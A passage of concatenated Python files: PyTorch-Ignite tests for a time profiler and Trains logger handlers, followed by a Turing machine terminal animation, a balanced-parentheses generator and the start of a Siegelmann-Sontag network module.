assert processing_results["min/index"][0] == approx(true_processing_time, abs=1e-1)
assert processing_results["max/index"][0] == approx(true_processing_time, abs=1e-1)
assert processing_results["mean"] == approx(true_processing_time, abs=1e-1)
assert processing_results["std"] == approx(0.0, abs=1e-1)
assert processing_results["total"] == approx(true_max_epochs * true_num_iters * true_processing_time, abs=1e-1)
def test_event_handler_started():
true_event_handler_time = 0.1
true_max_epochs = 2
true_num_iters = 2
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.STARTED)
def delay_start(engine):
time.sleep(true_event_handler_time)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
event_results = results["event_handlers_stats"]["STARTED"]
assert event_results["total"] == approx(true_event_handler_time, abs=1e-1)
def test_event_handler_completed():
true_event_handler_time = 0.1
true_max_epochs = 2
true_num_iters = 2
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.COMPLETED)
def delay_complete(engine):
time.sleep(true_event_handler_time)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
event_results = results["event_handlers_stats"]["COMPLETED"]
assert event_results["total"] == approx(true_event_handler_time, abs=1e-1)
def test_event_handler_epoch_started():
true_event_handler_time = 0.1
true_max_epochs = 2
true_num_iters = 1
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.EPOCH_STARTED)
def delay_epoch_start(engine):
time.sleep(true_event_handler_time)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
event_results = results["event_handlers_stats"]["EPOCH_STARTED"]
assert event_results["min/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["max/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["mean"] == approx(true_event_handler_time, abs=1e-1)
assert event_results["std"] == approx(0.0, abs=1e-1)
assert event_results["total"] == approx(true_max_epochs * true_event_handler_time, abs=1e-1)
def test_event_handler_epoch_completed():
true_event_handler_time = 0.1
true_max_epochs = 2
true_num_iters = 1
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.EPOCH_COMPLETED)
def delay_epoch_complete(engine):
time.sleep(true_event_handler_time)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
event_results = results["event_handlers_stats"]["EPOCH_COMPLETED"]
assert event_results["min/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["max/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["mean"] == approx(true_event_handler_time, abs=1e-1)
assert event_results["std"] == approx(0.0, abs=1e-1)
assert event_results["total"] == approx(true_max_epochs * true_event_handler_time, abs=1e-1)
def test_event_handler_iteration_started():
true_event_handler_time = 0.1
true_max_epochs = 1
true_num_iters = 2
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.ITERATION_STARTED)
def delay_iter_start(engine):
time.sleep(true_event_handler_time)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
event_results = results["event_handlers_stats"]["ITERATION_STARTED"]
assert event_results["min/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["max/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["mean"] == approx(true_event_handler_time, abs=1e-1)
assert event_results["std"] == approx(0.0, abs=1e-1)
assert event_results["total"] == approx(true_max_epochs * true_num_iters * true_event_handler_time, abs=1e-1)
def test_event_handler_iteration_completed():
true_event_handler_time = 0.1
true_max_epochs = 1
true_num_iters = 2
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.ITERATION_COMPLETED)
def delay_iter_complete(engine):
time.sleep(true_event_handler_time)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
event_results = results["event_handlers_stats"]["ITERATION_COMPLETED"]
assert event_results["min/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["max/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["mean"] == approx(true_event_handler_time, abs=1e-1)
assert event_results["std"] == approx(0.0, abs=1e-1)
assert event_results["total"] == approx(true_max_epochs * true_num_iters * true_event_handler_time, abs=1e-1)
def test_event_handler_get_batch_started():
true_event_handler_time = 0.1
true_max_epochs = 1
true_num_iters = 2
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.GET_BATCH_STARTED)
def delay_get_batch_started(engine):
time.sleep(true_event_handler_time)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
event_results = results["event_handlers_stats"]["GET_BATCH_STARTED"]
assert event_results["min/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["max/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["mean"] == approx(true_event_handler_time, abs=1e-1)
assert event_results["std"] == approx(0.0, abs=1e-1)
assert event_results["total"] == approx(true_max_epochs * true_num_iters * true_event_handler_time, abs=1e-1)
def test_event_handler_get_batch_completed():
true_event_handler_time = 0.1
true_max_epochs = 1
true_num_iters = 2
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.GET_BATCH_COMPLETED)
def delay_get_batch_completed(engine):
time.sleep(true_event_handler_time)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
event_results = results["event_handlers_stats"]["GET_BATCH_COMPLETED"]
assert event_results["min/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["max/index"][0] == approx(true_event_handler_time, abs=1e-1)
assert event_results["mean"] == approx(true_event_handler_time, abs=1e-1)
assert event_results["std"] == approx(0.0, abs=1e-1)
assert event_results["total"] == approx(true_max_epochs * true_num_iters * true_event_handler_time, abs=1e-1)
def test_event_handler_total_time():
true_event_handler_time = 0.125
true_max_epochs = 1
true_num_iters = 1
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.STARTED)
def delay_start(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.COMPLETED)
def delay_complete(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.EPOCH_STARTED)
def delay_epoch_start(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.EPOCH_COMPLETED)
def delay_epoch_complete(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.ITERATION_STARTED)
def delay_iter_start(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.ITERATION_COMPLETED)
def delay_iter_complete(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.GET_BATCH_STARTED)
def delay_get_batch_started(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.GET_BATCH_COMPLETED)
def delay_get_batch_completed(engine):
time.sleep(true_event_handler_time)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
event_results = results["event_handlers_stats"]
assert event_results["total_time"].item() == approx(true_event_handler_time * 8, abs=1e-1)
def test_write_results(dirname):
true_event_handler_time = 0.125
true_max_epochs = 3
true_num_iters = 2
profiler = BasicTimeProfiler()
dummy_trainer = get_prepared_engine(true_event_handler_time)
profiler.attach(dummy_trainer)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
fp = os.path.join(dirname, "test_log.csv")
profiler.write_results(fp)
assert os.path.isfile(fp)
file_length = 0
with open(fp) as f:
for l in f:
file_length += 1
assert file_length == (true_max_epochs * true_num_iters) + 1
def test_print_results(capsys):
true_max_epochs = 1
true_num_iters = 5
profiler = BasicTimeProfiler()
dummy_trainer = get_prepared_engine(true_event_handler_time=0.0125)
profiler.attach(dummy_trainer)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
BasicTimeProfiler.print_results(profiler.get_results())
captured = capsys.readouterr()
out = captured.out
assert "BasicTimeProfiler._" not in out
assert "nan" not in out
def test_get_intermediate_results_during_run(capsys):
true_event_handler_time = 0.0645
true_max_epochs = 2
true_num_iters = 5
profiler = BasicTimeProfiler()
dummy_trainer = get_prepared_engine(true_event_handler_time)
profiler.attach(dummy_trainer)
@dummy_trainer.on(Events.ITERATION_COMPLETED(every=3))
def log_results(_):
results = profiler.get_results()
profiler.print_results(results)
captured = capsys.readouterr()
out = captured.out
assert "BasicTimeProfiler._" not in out
assert "nan" not in out
assert " min/index: (0.0, " not in out, out
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
```
#### File: contrib/handlers/test_trains_logger.py
```python
import math
from unittest.mock import ANY, MagicMock, call
import pytest
import torch
import trains
from ignite.contrib.handlers.trains_logger import *
from ignite.engine import Engine, Events, State
from ignite.handlers import Checkpoint
def test_optimizer_params_handler_wrong_setup():
with pytest.raises(TypeError):
OptimizerParamsHandler(optimizer=None)
optimizer = MagicMock(spec=torch.optim.Optimizer)
handler = OptimizerParamsHandler(optimizer=optimizer)
mock_logger = MagicMock()
mock_engine = MagicMock()
with pytest.raises(RuntimeError, match="Handler OptimizerParamsHandler works only with TrainsLogger"):
handler(mock_engine, mock_logger, Events.ITERATION_STARTED)
def test_optimizer_params():
optimizer = torch.optim.SGD([torch.Tensor(0)], lr=0.01)
wrapper = OptimizerParamsHandler(optimizer=optimizer, param_name="lr")
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.iteration = 123
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
mock_logger.trains_logger.report_scalar.assert_called_once_with(iteration=123, series="0", title="lr", value=0.01)
wrapper = OptimizerParamsHandler(optimizer, param_name="lr", tag="generator")
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
mock_logger.trains_logger.report_scalar.assert_called_once_with(
iteration=123, series="0", title="generator/lr", value=0.01
)
def test_output_handler_with_wrong_logger_type():
wrapper = OutputHandler("tag", output_transform=lambda x: x)
mock_logger = MagicMock()
mock_engine = MagicMock()
with pytest.raises(RuntimeError, match="Handler OutputHandler works only with TrainsLogger"):
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
def test_output_handler_output_transform(dirname):
wrapper = OutputHandler("tag", output_transform=lambda x: x)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.output = 12345
mock_engine.state.iteration = 123
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
mock_logger.trains_logger.report_scalar.assert_called_once_with(
iteration=123, series="output", title="tag", value=12345
)
wrapper = OutputHandler("another_tag", output_transform=lambda x: {"loss": x})
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
mock_logger.trains_logger.report_scalar.assert_called_once_with(
iteration=123, series="loss", title="another_tag", value=12345
)
def test_output_handler_metric_names(dirname):
wrapper = OutputHandler("tag", metric_names=["a", "b"])
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State(metrics={"a": 12.23, "b": 23.45})
mock_engine.state.iteration = 5
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
assert mock_logger.trains_logger.report_scalar.call_count == 2
mock_logger.trains_logger.report_scalar.assert_has_calls(
[
call(title="tag", series="a", iteration=5, value=12.23),
call(title="tag", series="b", iteration=5, value=23.45),
],
any_order=True,
)
wrapper = OutputHandler("tag", metric_names=["a", "c"])
mock_engine = MagicMock()
mock_engine.state = State(metrics={"a": 55.56, "c": "Some text"})
mock_engine.state.iteration = 7
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
with pytest.warns(UserWarning):
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
assert mock_logger.trains_logger.report_scalar.call_count == 1
mock_logger.trains_logger.report_scalar.assert_has_calls(
[call(title="tag", series="a", iteration=7, value=55.56)], any_order=True
)
# all metrics
wrapper = OutputHandler("tag", metric_names="all")
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State(metrics={"a": 12.23, "b": 23.45})
mock_engine.state.iteration = 5
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
assert mock_logger.trains_logger.report_scalar.call_count == 2
mock_logger.trains_logger.report_scalar.assert_has_calls(
[
call(title="tag", series="a", iteration=5, value=12.23),
call(title="tag", series="b", iteration=5, value=23.45),
],
any_order=True,
)
def test_output_handler_both(dirname):
wrapper = OutputHandler("tag", metric_names=["a", "b"], output_transform=lambda x: {"loss": x})
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State(metrics={"a": 12.23, "b": 23.45})
mock_engine.state.epoch = 5
mock_engine.state.output = 12345
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
assert mock_logger.trains_logger.report_scalar.call_count == 3
mock_logger.trains_logger.report_scalar.assert_has_calls(
[
call(title="tag", series="a", iteration=5, value=12.23),
call(title="tag", series="b", iteration=5, value=23.45),
call(title="tag", series="loss", iteration=5, value=12345),
],
any_order=True,
)
def test_output_handler_with_wrong_global_step_transform_output():
def global_step_transform(*args, **kwargs):
return "a"
wrapper = OutputHandler("tag", output_transform=lambda x: {"loss": x}, global_step_transform=global_step_transform)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
mock_engine.state.output = 12345
with pytest.raises(TypeError, match="global_step must be int"):
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
def test_output_handler_with_global_step_from_engine():
mock_another_engine = MagicMock()
mock_another_engine.state = State()
mock_another_engine.state.epoch = 10
mock_another_engine.state.output = 12.345
wrapper = OutputHandler(
"tag",
output_transform=lambda x: {"loss": x},
global_step_transform=global_step_from_engine(mock_another_engine),
)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 1
mock_engine.state.output = 0.123
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
assert mock_logger.trains_logger.report_scalar.call_count == 1
mock_logger.trains_logger.report_scalar.assert_has_calls(
[call(title="tag", series="loss", iteration=mock_another_engine.state.epoch, value=mock_engine.state.output)]
)
mock_another_engine.state.epoch = 11
mock_engine.state.output = 1.123
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
assert mock_logger.trains_logger.report_scalar.call_count == 2
mock_logger.trains_logger.report_scalar.assert_has_calls(
[call(title="tag", series="loss", iteration=mock_another_engine.state.epoch, value=mock_engine.state.output)]
)
def test_output_handler_with_global_step_transform():
def global_step_transform(*args, **kwargs):
return 10
wrapper = OutputHandler("tag", output_transform=lambda x: {"loss": x}, global_step_transform=global_step_transform)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
mock_engine.state.output = 12345
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
assert mock_logger.trains_logger.report_scalar.call_count == 1
mock_logger.trains_logger.report_scalar.assert_has_calls(
[call(title="tag", series="loss", iteration=10, value=12345)]
)
def test_weights_scalar_handler_wrong_setup():
with pytest.raises(TypeError, match="Argument model should be of type torch.nn.Module"):
WeightsScalarHandler(None)
model = MagicMock(spec=torch.nn.Module)
with pytest.raises(TypeError, match="Argument reduction should be callable"):
WeightsScalarHandler(model, reduction=123)
with pytest.raises(ValueError, match="Output of the reduction function should be a scalar"):
WeightsScalarHandler(model, reduction=lambda x: x)
wrapper = WeightsScalarHandler(model)
mock_logger = MagicMock()
mock_engine = MagicMock()
with pytest.raises(RuntimeError, match="Handler WeightsScalarHandler works only with TrainsLogger"):
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
def test_weights_scalar_handler(dummy_model_factory):
model = dummy_model_factory(with_grads=True, with_frozen_layer=False)
# define test wrapper to test with and without optional tag
def _test(tag=None):
wrapper = WeightsScalarHandler(model, tag=tag)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
tag_prefix = "{}/".format(tag) if tag else ""
assert mock_logger.trains_logger.report_scalar.call_count == 4
mock_logger.trains_logger.report_scalar.assert_has_calls(
[
call(title=tag_prefix + "weights_norm/fc1", series="weight", iteration=5, value=0.0),
call(title=tag_prefix + "weights_norm/fc1", series="bias", iteration=5, value=0.0),
call(title=tag_prefix + "weights_norm/fc2", series="weight", iteration=5, value=12.0),
call(title=tag_prefix + "weights_norm/fc2", series="bias", iteration=5, value=math.sqrt(12.0)),
],
any_order=True,
)
_test()
_test(tag="tag")
def test_weights_scalar_handler_frozen_layers(dummy_model_factory):
model = dummy_model_factory(with_grads=True, with_frozen_layer=True)
wrapper = WeightsScalarHandler(model)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
mock_logger.trains_logger.report_scalar.assert_has_calls(
[
call(title="weights_norm/fc2", series="weight", iteration=5, value=12.0),
call(title="weights_norm/fc2", series="bias", iteration=5, value=math.sqrt(12.0)),
],
any_order=True,
)
with pytest.raises(AssertionError):
mock_logger.trains_logger.report_scalar.assert_has_calls(
[
call(title="weights_norm/fc1", series="weight", iteration=5, value=12.0),
call(title="weights_norm/fc1", series="bias", iteration=5, value=math.sqrt(12.0)),
],
any_order=True,
)
assert mock_logger.trains_logger.report_scalar.call_count == 2
def test_weights_hist_handler_wrong_setup():
with pytest.raises(TypeError, match="Argument model should be of type torch.nn.Module"):
WeightsHistHandler(None)
model = MagicMock(spec=torch.nn.Module)
wrapper = WeightsHistHandler(model)
mock_logger = MagicMock()
mock_engine = MagicMock()
with pytest.raises(RuntimeError, match="Handler 'WeightsHistHandler' works only with TrainsLogger"):
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
def test_weights_hist_handler(dummy_model_factory):
model = dummy_model_factory(with_grads=True, with_frozen_layer=False)
# define test wrapper to test with and without optional tag
def _test(tag=None):
wrapper = WeightsHistHandler(model, tag=tag)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.grad_helper = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
tag_prefix = "{}/".format(tag) if tag else ""
assert mock_logger.grad_helper.add_histogram.call_count == 4
mock_logger.grad_helper.add_histogram.assert_has_calls(
[
call(title=tag_prefix + "weights_fc1", hist_data=ANY, series="weight", step=5),
call(title=tag_prefix + "weights_fc1", hist_data=ANY, series="bias", step=5),
call(title=tag_prefix + "weights_fc2", hist_data=ANY, series="weight", step=5),
call(title=tag_prefix + "weights_fc2", hist_data=ANY, series="bias", step=5),
],
any_order=True,
)
_test()
_test(tag="tag")
def test_weights_hist_handler_frozen_layers(dummy_model_factory):
model = dummy_model_factory(with_grads=True, with_frozen_layer=True)
wrapper = WeightsHistHandler(model)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.grad_helper = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
mock_logger.grad_helper.add_histogram.assert_has_calls(
[
call(title="weights_fc2", hist_data=ANY, series="weight", step=5),
call(title="weights_fc2", hist_data=ANY, series="bias", step=5),
],
any_order=True,
)
with pytest.raises(AssertionError):
mock_logger.grad_helper.add_histogram.assert_has_calls(
[
call(title="weights_fc1", hist_data=ANY, series="weight", step=5),
call(title="weights_fc1", hist_data=ANY, series="bias", step=5),
],
any_order=True,
)
assert mock_logger.grad_helper.add_histogram.call_count == 2
def test_grads_scalar_handler_wrong_setup():
with pytest.raises(TypeError, match="Argument model should be of type torch.nn.Module"):
GradsScalarHandler(None)
model = MagicMock(spec=torch.nn.Module)
with pytest.raises(TypeError, match="Argument reduction should be callable"):
GradsScalarHandler(model, reduction=123)
wrapper = GradsScalarHandler(model)
mock_logger = MagicMock()
mock_engine = MagicMock()
with pytest.raises(RuntimeError, match="Handler GradsScalarHandler works only with TrainsLogger"):
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
def test_grads_scalar_handler(dummy_model_factory, norm_mock):
model = dummy_model_factory(with_grads=True, with_frozen_layer=False)
# define test wrapper to test with and without optional tag
def _test(tag=None):
wrapper = GradsScalarHandler(model, reduction=norm_mock, tag=tag)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
norm_mock.reset_mock()
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
tag_prefix = "{}/".format(tag) if tag else ""
mock_logger.trains_logger.report_scalar.assert_has_calls(
[
call(
title=tag_prefix + "grads_norm/fc1", value=ANY, series="weight", iteration=mock_engine.state.epoch
),
call(title=tag_prefix + "grads_norm/fc1", value=ANY, series="bias", iteration=mock_engine.state.epoch),
call(
title=tag_prefix + "grads_norm/fc2", value=ANY, series="weight", iteration=mock_engine.state.epoch
),
call(title=tag_prefix + "grads_norm/fc2", value=ANY, series="bias", iteration=mock_engine.state.epoch),
],
any_order=True,
)
assert mock_logger.trains_logger.report_scalar.call_count == 4
assert norm_mock.call_count == 4
_test()
_test(tag="tag")
def test_grads_scalar_handler_frozen_layers(dummy_model_factory, norm_mock):
model = dummy_model_factory(with_grads=True, with_frozen_layer=True)
wrapper = GradsScalarHandler(model, reduction=norm_mock)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.trains_logger = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
norm_mock.reset_mock()
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
mock_logger.trains_logger.report_scalar.assert_has_calls(
[
call(title="grads_norm/fc2", value=ANY, series="weight", iteration=mock_engine.state.epoch),
call(title="grads_norm/fc2", value=ANY, series="bias", iteration=mock_engine.state.epoch),
],
any_order=True,
)
with pytest.raises(AssertionError):
mock_logger.trains_logger.report_scalar.assert_has_calls(
[call(title="grads_norm/fc1", value=ANY, iteration=5), call("grads_norm/fc1", ANY, 5)], any_order=True
)
assert mock_logger.trains_logger.report_scalar.call_count == 2
assert norm_mock.call_count == 2
def test_grads_hist_handler_wrong_setup():
with pytest.raises(TypeError, match="Argument model should be of type torch.nn.Module"):
GradsHistHandler(None)
model = MagicMock(spec=torch.nn.Module)
wrapper = GradsHistHandler(model)
mock_logger = MagicMock()
mock_engine = MagicMock()
with pytest.raises(RuntimeError, match="Handler 'GradsHistHandler' works only with TrainsLogger"):
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
def test_grads_hist_handler(dummy_model_factory):
model = dummy_model_factory(with_grads=True, with_frozen_layer=False)
# define test wrapper to test with and without optional tag
def _test(tag=None):
wrapper = GradsHistHandler(model, tag=tag)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.grad_helper = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
tag_prefix = "{}/".format(tag) if tag else ""
assert mock_logger.grad_helper.add_histogram.call_count == 4
mock_logger.grad_helper.add_histogram.assert_has_calls(
[
call(title=tag_prefix + "grads_fc1", hist_data=ANY, series="weight", step=5),
call(title=tag_prefix + "grads_fc1", hist_data=ANY, series="bias", step=5),
call(title=tag_prefix + "grads_fc2", hist_data=ANY, series="weight", step=5),
call(title=tag_prefix + "grads_fc2", hist_data=ANY, series="bias", step=5),
],
any_order=True,
)
_test()
_test(tag="tag")
def test_grads_hist_frozen_layers(dummy_model_factory):
model = dummy_model_factory(with_grads=True, with_frozen_layer=True)
wrapper = GradsHistHandler(model)
mock_logger = MagicMock(spec=TrainsLogger)
mock_logger.grad_helper = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.epoch = 5
wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
assert mock_logger.grad_helper.add_histogram.call_count == 2
mock_logger.grad_helper.add_histogram.assert_has_calls(
[
call(title="grads_fc2", hist_data=ANY, series="weight", step=5),
call(title="grads_fc2", hist_data=ANY, series="bias", step=5),
],
any_order=True,
)
with pytest.raises(AssertionError):
mock_logger.grad_helper.add_histogram.assert_has_calls(
[
call(title="grads_fc1", hist_data=ANY, series="weight", step=5),
call(title="grads_fc1", hist_data=ANY, series="bias", step=5),
],
any_order=True,
)
def test_integration(dirname):
n_epochs = 5
data = list(range(50))
losses = torch.rand(n_epochs * len(data))
losses_iter = iter(losses)
def update_fn(engine, batch):
return next(losses_iter)
trainer = Engine(update_fn)
TrainsLogger.set_bypass_mode(True)
logger = TrainsLogger(output_uri=dirname)
def dummy_handler(engine, logger, event_name):
global_step = engine.state.get_event_attrib_value(event_name)
logger.trains_logger.report_scalar(title="", series="", value="test_value", iteration=global_step)
logger.attach(trainer, log_handler=dummy_handler, event_name=Events.EPOCH_COMPLETED)
trainer.run(data, max_epochs=n_epochs)
logger.close()
def test_integration_as_context_manager(dirname):
n_epochs = 5
data = list(range(50))
losses = torch.rand(n_epochs * len(data))
losses_iter = iter(losses)
def update_fn(engine, batch):
return next(losses_iter)
TrainsLogger.set_bypass_mode(True)
with TrainsLogger(output_uri=dirname) as trains_logger:
trainer = Engine(update_fn)
def dummy_handler(engine, logger, event_name):
global_step = engine.state.get_event_attrib_value(event_name)
logger.trains_logger.report_scalar(title="", series="", value="test_value", iteration=global_step)
trains_logger.attach(trainer, log_handler=dummy_handler, event_name=Events.EPOCH_COMPLETED)
trainer.run(data, max_epochs=n_epochs)
def test_trains_disk_saver_integration():
model = torch.nn.Module()
to_save_serializable = {"model": model}
mock_logger = MagicMock(spec=TrainsLogger)
trains_saver = TrainsSaver(mock_logger)
trains.binding.frameworks.WeightsFileHandler.create_output_model = MagicMock()
checkpoint = Checkpoint(to_save=to_save_serializable, save_handler=trains_saver, n_saved=1)
trainer = Engine(lambda e, b: None)
trainer.state = State(epoch=0, iteration=0)
checkpoint(trainer)
trainer.state.iteration = 1
checkpoint(trainer)
assert trains.binding.frameworks.WeightsFileHandler.create_output_model.call_count == 2
``` |
{
"source": "jonrbates/turing",
"score": 3
} |
#### File: turing/scripts/make_turing_machine_animation.py
```python
import curses
from time import sleep
from turing.wcm.simulator import Simulator
def render(tape, state, head):
cursor = "^"
pad = 1
stdscr.clear()
# show tape
pos = pad
l = "tape: "
stdscr.addstr(pad, pos, l, curses.A_DIM)
pos += len(l)
l = tape
stdscr.addstr(pad, pos, l)
# show head
pos = pad
l = "head: "
stdscr.addstr(pad+1, pos, l, curses.A_DIM)
pos += len(l) + head
l = cursor
stdscr.addstr(pad+1, pos, l, curses.color_pair(1) | curses.A_BOLD)
# show state
pos = pad
l = "state: "
stdscr.addstr(pad+2, pos, l, curses.A_DIM)
pos += len(l)
l = state
stdscr.addstr(pad+2, pos, state, curses.color_pair(2))
stdscr.refresh()
tx = Simulator()
delta = tx.delta
tape = "B()((()(()))())E"
head = 0
state = "I"
n = len(tape)
final_states = ["T", "F"]
try:
stdscr = curses.initscr()
curses.curs_set(0)
curses.start_color()
curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_YELLOW, curses.COLOR_BLACK)
sleep(3)
while state not in final_states:
render(tape, state, head)
# update
(state, write, move) = delta[(state, tape[head])]
# write
tape = tape[:head] + write + tape[head+1:]
# move
head += move
sleep(.3)
render(tape, state, head)
sleep(.3)
finally:
curses.echo()
curses.nocbreak()
curses.endwin()
```
#### File: src/turing/balanced_parentheses.py
```python
def generate_balanced_parentheses(n: int):
"""generate all balanced parentheses strings of length 2n
copied this from leetcode :)
"""
ans = []
def backtrack(S = [], left = 0, right = 0):
if len(S) == 2 * n:
ans.append("".join(S))
return
if left < n:
S.append("(")
backtrack(S, left+1, right)
S.pop()
if right < left:
S.append(")")
backtrack(S, left, right+1)
S.pop()
backtrack()
return ans
```
#### File: turing/ss/networks.py
```python
import torch
from itertools import product
from torch import Tensor
from torch.nn import (
Module,
Linear,
Parameter
)
from turing.functional import saturated_relu
from typing import Tuple
class SiegelmannSontag1(Module):
"""TODO:
"""
def __init__(self, s: int, p: int):
super().__init__()
self.s = s
self.p = p
# configuration detector
self.configuration_detector = ConfigurationDetector1(s, p)
# aggregate sub to full
w = torch.zeros(p, 4*p)
for k in range(p):
w[k, 4*k:4*k+4] = 1
linear = Linear(4*p, p, bias=False)
linear.weight = Parameter(w)
self.linear_stack = linear
self.linear_top = linear
# linear combine configuration detectors
self.beta = Linear(s * 9**p, s, bias=False)
self.gamma = Linear(s * 9**p, 4*p, bias=False)
